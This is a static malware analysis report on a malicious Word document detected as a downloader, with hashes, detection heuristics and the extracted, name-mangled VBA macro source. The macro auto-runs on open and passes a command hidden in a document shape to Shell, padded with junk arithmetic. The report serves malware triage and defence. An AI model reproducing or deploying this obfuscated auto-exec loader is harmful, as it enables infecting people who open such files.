Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 318e122cc018792b…

MALICIOUS

Office (OLE)

Size: 140.0 KB
Created: 2018-12-06 19:10:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 2ebf05c7ff8c1da7ee7b702bcd04f78f
SHA-1: 20ec5df658dc05bdf60c8f267318165dd97596f8
SHA-256: 318e122cc018792b73feb73b9cb38616094dcbaaf6930241314d4ac6c38422e2
Risk score: 292

Heuristics (10)

  • ClamAV: Doc.Downloader.Generic-6775287-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6775287-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched lines in script:
      VVmOZw = Array(oiqflON, JOBls, iuOAOARQL, Interaction _
      .Shell(XwafbiRZuaT, KBnRTXjCFO), nHiFWbrB)
      FbwPoRcwTwIMbQjbqXi = 270409642 * CInt(28766685) + IFrWjGMiwjRSqJCXQl + CLng(119904062 + Sgn(WmhrbRDLJOkQXmS) - 302517960 * 160152702) - kWklBcvJZZYTGtWzz + Chr(XAuPCAYhwAvEqIwwAv) * 147554186 / CStr(241274724) / (FvSrinqIquZpwWXXVTkMU / 205002030 / OVjQUIsabMmSEcXYNiZGGVP / Fix(maafcmXPZAEWuXVzwTwcKDT + Hex(zvWivZosFodtiMwooWsDYBdq) + 81004297 + CBool(166947172 + mWnkjHiihPtUAML)))
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched lines in script:
      Attribute VB_Customizable = True
      Sub autoopen()
      qnZWWh
  • Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
  • Reference to PowerShell [high] SC_STR_POWERSHELL
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6130 bytes
SHA-256: 2d51c9c0026ecd7ddc391ecd0482844d6515b439aefc27041946c736dd52a786

Detection:
ClamAV: No threats found
Obfuscation or payload: likely
141 of 178 identifiers look randomly generated (e.g. 'sHvcJdnHtQhLrIdjUabitEwB'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "UjIijMvdkAT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
qnZWWh
End Sub

Attribute VB_Name = "rnunwizviwZHbi"
Function qnZWWh()
On Error Resume Next
   ovatdnLVZVLPwYcHBORGZod = 10037019 * CInt(142484358) + UrVbBZXIuWcjJtlwqtiKr + CLng(233324552 + Sgn(icTvMUzRYXvSUAwTlsq) - 194330748 * 41804798) - VEXVawjTLplSnwhiKouE + Chr(IObRwrawSAFSCH) * 99494603 / CStr(153431847) / (tBhFMFhBNzlGhBiBcMqwEcG / 60963421 / tpfAkqSHUutXzwIuPl / Fix(pplwXRavYamRuYiTQBBcISz + Hex(GpiiQiCoqOUjIqIj) + 67047674 + CBool(314056443 + jhdzwOdrsOIjWqYsimvfpYw)))
   ZrzGLacTVDwTLzaWl = 21253342 * CInt(138785575) + KdsJzTrjhpjYGsJLTnB + CLng(283405170 + Sgn(ialZiMuoWVbWXEvwqHsjsm) - 211691679 * 133163984) - NSnOCzBiljCHkUGzuLU + Chr(BioNMdjJHvsuRBR) * 298215737 / CStr(45389027) / (TXaslXtrFmlmzbLMWii / 173472482 / ZRrWqoIpiCNqVr / Fix(hIwQUUXtYVzQiEfnOjXuFiWv + Hex(lBWkXvcjPfNiOGhBYTAsX) + 167803432 + CBool(241792731 + PzJzzqwlAjjTAJ)))
   sTzwfVFGhKZDXhPzMjN = 340420668 * CInt(80418038) + apmhvLSvmjffMpmSR + CLng(332864346 + Sgn(vAdDkRNfvdoEDPZsH) - 68509477 * 332487776) - unlYtXsVZKtRPiQSzmB + Chr(hfWSzbbPmziITYXHO) * 27224329 / CStr(65211423) / (ZsFkjWpVzGuUIjsO / 114405357 / bRvdicjlwqLIEtcoqp / Fix(liamGPfCKzkfIqvcsRv + Hex(cEwYwKrCBsUsDofk) + 5772080 + CBool(203214435 + ODaVmOLCRIQjWvfzhkCnvY)))
   VJOQrkrTSHkbwUnNA = 225364352 * CInt(209469183) + sUsmQTiJzuljXOfADp + CLng(259106199 + Sgn(miouhUXcUVNOUbXA) - 113380004 * 185650165) - YBiWXVADhpmJLu + Chr(hKfwEwwFobjWPwrijb) * 270523908 / CStr(97983515) / (DLQYhQpniLCTAtMV / 122876985 / EcvturwlGqKChWfJiw / Fix(aXfHSGPiDPDiJREkm + Hex(JRZZvKwdfdjnqOOFs) + 338562354 + CBool(161519525 + dniMvWCLAldltvUhpA)))
   ZuwYsAnwiRJjuDcNL = 192360324 * CInt(149292571) + qfiiDnDYSwvlEiwvzaGqG + CLng(284473452 + Sgn(HubcfGtmLzLXtQTVEwOjlWX) - 183951798 * 77768362) - jNkXjcznXkcLXSY + Chr(jmtKFffFBtrKGkWz) * 107385540 / CStr(178038298) / (jBoTiYFtjstZwHanliA / 337584247 / hiVmlojmOcuwts / Fix(uTLmzlwMHUuDjzk + Hex(PbXwXShwjZHUQwcDO) + 115584281 + CBool(296813228 + XOzQlRORrkAodLfUV)))
   wlkLSisNhjWWJD = 8366093 * CInt(74358299) + spkIUimlkoCVEkwpFCnif + CLng(249281022 + Sgn(OUnzvJzIYaXcQorbCzZiqq) - 292665272 * 191208431) - YjDANcFGBWohjrckjiujIiBN + Chr(klGDwXbKEXcvHKwSVPR) * 17152941 / CStr(304111570) / (GzzJMzwmqfpZdrzCCw / 84105702 / iUzoYUwOmSjLhRfJFo / Fix(dNRjwGhhGSSMTpXo + Hex(zJksBiAXwisMMqzOmiJNn) + 16731796 + CBool(226116686 + npvTGPVKctLwDTciRJAbpUu)))
Set IpamzPY = UjIijMvdkAT.Shapes(QDYFMRlW + "sZGPnCXauoPl" + MdZHmcuA).TextFrame
   trfhcWSlwlmUVorbfHMK = 127469432 * CInt(129080622) + IfqPXLnAjYZVijzJ + CLng(214890118 + Sgn(szzCMMUNWimlnJ) - 167563748 * 204716081) - BlGuZJlFvwTMujzfHb + Chr(OGSiuJpIOulPvzJzYZ) * 54946452 / CStr(123748075) / (MwRPBBbwpFfiDQQjGMkjAW / 72348740 / jXMliZFzIhBKBOtI / Fix(JZoFhsitORNXjoplH + Hex(doqQPAjaWOGhsSbVqzWEw) + 206679658 + CBool(196792563 + TIsbZsMZuiPUYtJoYHVUmjZ)))
   rRGtLroRADhWuoA = 296450611 * CInt(65342318) + KZpiiWvTmzXzmAMkSsz + CLng(297673175 + Sgn(GrtuQcUzcJjndWtQJj) - 234628449 * 326263145) - EquARjKJWItQADhvoRtbUJn + Chr(MIiSTIIPvfCAztzvKpGAmW) * 189472951 / CStr(120487925) / (UVRpWXuDDnICrpNz / 201281890 / VBhwuSwQiDnDqfMGwn / Fix(ZZHHzvFrtTzsAIBHQiYazrF + Hex(qPAzcpkqZIEvNujAobEziKm) + 307993083 + CBool(271321970 + vcaMriTOQhvIODiJTsD)))
XwafbiRZuaT = IpamzPY.ContainingRange + uYmYmI + dGIDtIQ + WcziCF + AOVru + iZhBaTv + kEpAKKas + jcursTG + uuojOYY
   JvFRCQERolnjRpRBwzd = 275754220 * CInt(31166805) + AqzRpEvrjtfuzNKmt + CLng(28197580 + Sgn(JzELzBnnIwARNVtuPS) - 242795730 * 177803182) - VwCuAXsDrJEYTuSwiBPBQmvj + Chr(SZDTuUIdWnBCRwivjRm) * 315509403 / CStr(294327436) / (abwkQVZiiASSizokzpvvzGR / 304089512 / ElGhVIniYzcUJDnE / Fix(FAjwOhGzUzAzvTKEWMkSBN + Hex(ijJwMQnlIrKBQKPqDAhBLnl) + 192320597 + CBool(213685300 + QmrDlmrHEPEjtijLr)))
   wijRnzNHkoHjLLUqh = 313026809 * CInt(113138252) + CXiVYhmFdhriODHQoiIjdI + CLng(260212537 + Sgn(YmLIwptSAiPbEKsFNIdCw) - 160145528 * 137011669) - DDCzmkLujwzmViH + Chr(oZifnjMdpDTVfklzRDEumu) * 205931237 / CStr(104015059) / (VsHNGjjBoOXppUXqYKj / 114664437 / PwLzUSZMBuuSISoEQiTjUq / Fix(NKcjhEOjvwiGtwQmRK + Hex(mTdXjBilIbQhVYbznrjrIn) + 69262823 + CBool(333802581 + ZMuIzvCZfEDkmvhwSG)))
Const KBnRTXjCFO = 0
   ZXLEnwwqmibPQudUNqjRhQb = 222702627 * CInt(234896881) + wVSSzwPSsRprmKKCPMRHc + CLng(132769557 + Sgn(oWwdMKIviUCwbXTidAwC) - 81932653 * 207465908) - DWHfBPQcIdpiwBUCIk + Chr(LWkLjiwhnHiRTIAuHF) * 205056610 / CStr(45987836) / (NstUltXcIzpSqUwTKXAE / 221675515 / UiLVWvGNwddpziqrzlYE / Fix(KozcoCbwhiCwkYPIPWbW + Hex(AMoAWUcTaOjcwKpMtitfQPwb) + 286204769 + CBool(88322063 + aihOzijJbLcRiwd)))
   tGkosKowbSHXOtm = 192828507 * CInt(332237974) + ZrRGKwuKLVmisBrOiFPH + CLng(62987084 + Sgn(BiaBwpQjVsCpiGnnvluhz) - 126727282 * 78465682) - ZGfAOhNrWqpjjJCEubztbDTk + Chr(rKiNbjiWdbpKQVofLTr) * 115918932 / CStr(30204219) / (lipnYUSVWmuZXXi / 196896381 / HGMCiNuiGKNPkbTVkYvXoLO / Fix(HFDQqwRwhYkKsE + Hex(VvJRJFFmKaDmwn) + 43345010 + CBool(41191631 + sHvcJdnHtQhLrIdjUabitEwB)))
VVmOZw = Array(oiqflON, JOBls, iuOAOARQL, Interaction _
.Shell(XwafbiRZuaT, KBnRTXjCFO), nHiFWbrB)
   FbwPoRcwTwIMbQjbqXi = 270409642 * CInt(28766685) + IFrWjGMiwjRSqJCXQl + CLng(119904062 + Sgn(WmhrbRDLJOkQXmS) - 302517960 * 160152702) - kWklBcvJZZYTGtWzz + Chr(XAuPCAYhwAvEqIwwAv) * 147554186 / CStr(241274724) / (FvSrinqIquZpwWXXVTkMU / 205002030 / OVjQUIsabMmSEcXYNiZGGVP / Fix(maafcmXPZAEWuXVzwTwcKDT + Hex(zvWivZosFodtiMwooWsDYBdq) + 81004297 + CBool(166947172 + mWnkjHiihPtUAML)))
   uDdppFCshMtjofavw = 290503212 * CInt(222938518) + UYMkKsHPfawlOqsiuLKbXaU + CLng(331391707 + Sgn(UOTiwnDKbzWqsizwmNHPI) - 121126368 * 329046829) - vBliGTtEOBpdohjntamtWn + Chr(jMckNNiaCQfmuC) * 139078418 / CStr(27505282) / (ERcqpUKFiTWifEQ / 55141507 / EVijfrfbnMIvol / Fix(WfoELKrrRijtMsWMPdu + Hex(zaYYawPBICKpiwLAPMzpNdME) + 314655307 + CBool(326224728 + jRAsRunYwGQdOuqjPU)))
End Function